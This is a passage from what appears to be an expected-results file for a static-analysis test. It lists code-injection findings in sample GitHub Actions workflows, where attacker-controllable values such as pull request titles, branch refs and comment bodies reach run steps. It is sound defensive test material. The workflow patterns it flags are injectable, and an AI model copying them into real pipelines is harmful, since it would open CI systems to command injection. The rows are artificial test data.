github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | issue_comment | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | ${{ needs.get-artifacts.outputs.ref }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | 